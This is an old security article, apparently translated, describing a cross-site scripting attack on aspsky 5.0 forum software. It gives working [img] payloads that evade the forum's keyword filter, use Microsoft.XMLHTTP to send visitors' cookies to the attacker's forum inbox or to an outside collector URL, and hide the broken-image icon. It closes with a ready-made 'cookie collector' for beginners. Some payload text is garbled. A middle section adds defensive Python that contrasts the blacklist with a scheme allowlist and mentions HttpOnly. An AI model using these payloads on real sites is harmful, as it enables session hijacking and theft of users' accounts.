Author: czy <czy82@elong.com>
Source: http://www.nsfocus.net
Date: 2003-09-03
(Note: this article is best read together with http://www.chinansl.com/czy/xmlhttp.txt and the test code at http://www.chinansl.com/czy/aspsky5.htm.)
You may already be familiar with cross-site scripting attacks, but there has always been one problem: you have to use window.open to pop up a window and then send the cookie from it, which is hardly stealthy. That takes a lot away from the attack. I used to think about using the insertAdjacentHTML method to inject HTML into the page; that method just about allows sending the cookie without a visible IE window, but in actual use IE sometimes throws an error.
Is there a better way? There is: the Microsoft.XMLHTTP control (a default built-in control on Win98/2K, and one that IE considers safe!). Through it we can send an HTTP request, either POST or GET, to a website from within a webpage.
With that idea in hand, let's see how it works. I will use aspsky 5.0 0320 as the example.
We know that VBScript can be written into an IMG SRC attribute, with a statement such as the following, for example:
but only one statement can be executed this way; something like
will all fail!
What should I do? In VBScript we can use the Execute statement, and in JavaScript we can use eval! For example:
Or
Not dizzy yet, right? You may notice that when using the VBScript Execute statement, the double quotation marks must be replaced. This is because: in VBScript a string must be enclosed in double quotation marks, and a literal quotation mark inside a string is written as two double quotation marks! So inside the Execute statement we cannot use single quotation marks, and if we write " directly, HTML will pair it with the quotation mark after src=", so we can only use a substitute instead.
The quotation-mark problem is solved. In actual application, aspsky also processes our code:
1: If the string "script" is found, a space is inserted in front of it.
2: If the string "http" is found, it is treated as a URL and an <A> element is added on both sides.
3: If a space is found, it is replaced.
Solution:
1: Write vbscript with different letter case, as VBScript.
2: Replace http with "HT"+"TP" (two separate strings in quotation marks in VBScript, with + as the concatenation operator).
3: Use a substitute for spaces.
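The filter described above is a keyword blacklist, and both workarounds (changing the letter case of vbscript, splitting http into two strings) defeat string matching rather than any real URL check. As an added example that is not code from the article or from aspsky, the Python below models the two substitutions exactly as the text states them (the space-replacement rule is left out because the page does not say what spaces become) and contrasts them with a scheme allowlist, which rejects every sample the blacklist lets through. The post texts and URLs are constructed for this example.

```python
# Added example, not code from the original article or from aspsky: it models
# the keyword blacklist the article describes and contrasts it with a scheme
# allowlist. The post texts and URLs below are constructed for this example.
import html
import re
from urllib.parse import urlsplit

IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
ALLOWED_SCHEMES = {"http", "https"}


def weak_filter(text: str) -> str:
    """Model of the two aspsky substitutions the article spells out: a space is
    inserted before the literal 'script', and anything starting with the literal
    'http' is wrapped in an <A> element. The matching is case-sensitive, which is
    what the article's VBScript and HT+TP tricks rely on."""
    text = text.replace("script", " script")
    text = re.sub(r"(http\S+)", r'<A href="\1">\1</A>', text)
    return text


def is_safe_image_url(url: str) -> bool:
    """Allowlist check: accept a URL only if, after removing the control
    characters and whitespace that browsers ignore inside a scheme, it parses
    with an http/https scheme and a host. Everything else (vbscript:, javascript:,
    HT+TP:, data:, or no scheme at all) is rejected."""
    cleaned = re.sub(r"[\x00-\x20]", "", url)
    parts = urlsplit(cleaned)
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)


def render_images(post: str) -> str:
    """Turn [img]...[/img] into <img> only for allowlisted URLs; otherwise emit a
    placeholder instead of trying to 'clean' the rejected value in place."""
    def replace(match):
        url = match.group(1).strip()
        if is_safe_image_url(url):
            return '<img src="%s">' % html.escape(url, quote=True)
        return "[blocked image]"
    return IMG_TAG.sub(replace, post)


if __name__ == "__main__":
    samples = [
        "http://www.example.com/pic.gif",  # legitimate image
        "vbscript:MsgBox(1)",              # caught by the blacklist
        "VBScript:MsgBox(1)",              # slips past the blacklist (letter case)
        "\tjavascript:alert(1)",           # leading tab, ignored by browsers
        "HT+TP://www.example.com/x",       # the article's http-split trick
    ]
    for s in samples:
        print("%-32r blacklist=%-48r allowlist=%s"
              % (s, weak_filter(s), is_safe_image_url(s)))
    print(render_images("see [img]http://www.example.com/pic.gif[/img] "
                        "and [img]VBScript:MsgBox(1)[/img]"))
```

The allowlist never needs to know which keyword an attacker will disguise next: it decides on the parsed scheme and host, so case changes, inserted control characters and string splitting all fail in the same way. Cookies that scripts never need to read should additionally carry the HttpOnly flag (honoured by IE 6 SP1 and later), which removes them from document.cookie and therefore from anything a payload of this kind can collect.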
The last question is about sending the cookie:
1: Locally the control can GET or POST to any website, but from a webpage it can only GET or POST to the current server... otherwise IE rejects the request!
2: The cookie cannot contain & or other characters that have special meaning in a URL.
Solution:
1: Since it can only be sent to the current server, send the cookie to the mailbox of a user you have registered on the forum :)
2: Replace(document.cookie, "&", "-"): in VBScript, Replace is used for this. In this example I replace "&" with "-".
The problem is solved as follows; the test on aspsky 5.0 0320 was successful:
//----------------------
[img]vbsrept:Execute(DAT=Replace(document.cookie,&,-):set http=CreateObject(Microsoft.XMLHTTP):http.open get,HT+TP://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?Action=Send&touser=czy&Title=News&submit=Send&message=&dat,false:http.Send)[/img]
Note: this sends the cookie to the user czy, with the message title "news".
//----------------------
In addition, the normal usage of the control is as follows:
<script language="vbs">
dat = document.cookie
Set http = CreateObject("Microsoft.XMLHTTP")
http.Open "POST", "http://www.chinansl.com/czy/get.asp?cook=" & dat, False
http.Send
tt = http.responseText
MsgBox tt
</script>
Let's make the code more perfect. The cookie now arrives in our mailbox, but there is a small problem: because the image does not display normally, it shows as a broken-image cross, and there is a prompt to open the image in a new window... This will inevitably make people suspicious.
Solution:
All IMG elements in a webpage can be enumerated through document.images, and their size can be set; a width of 0 is equivalent to hidden. You can check whether the element's src attribute contains "ript" to tell whether it is our image, and set the width of the one that matches to 0!
Code:
[img]vbsrept:Execute(foreachaaindocument.Images:ifinstr(AA.SRC,ript)then:AA.width=0:endif:Next)[/img]
Actual application code:
[img]vbsrept:Execute(foreachaaindocument.images:ifinstr(AA.SRC,ript)then:AA.width=0:endif:Next:DAT=Replace(document.cookie,&,-):set http=CreateObject(Microsoft.XMLHTTP):http.open get,HT+TP://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?Action=Send&touser=czy&Title=alll&submit=Send&message=&dat,false:http.Send)[/img]
// ------------------- Convenient for newbies :) Aspsky 5.0 0320 cookie collector -- czy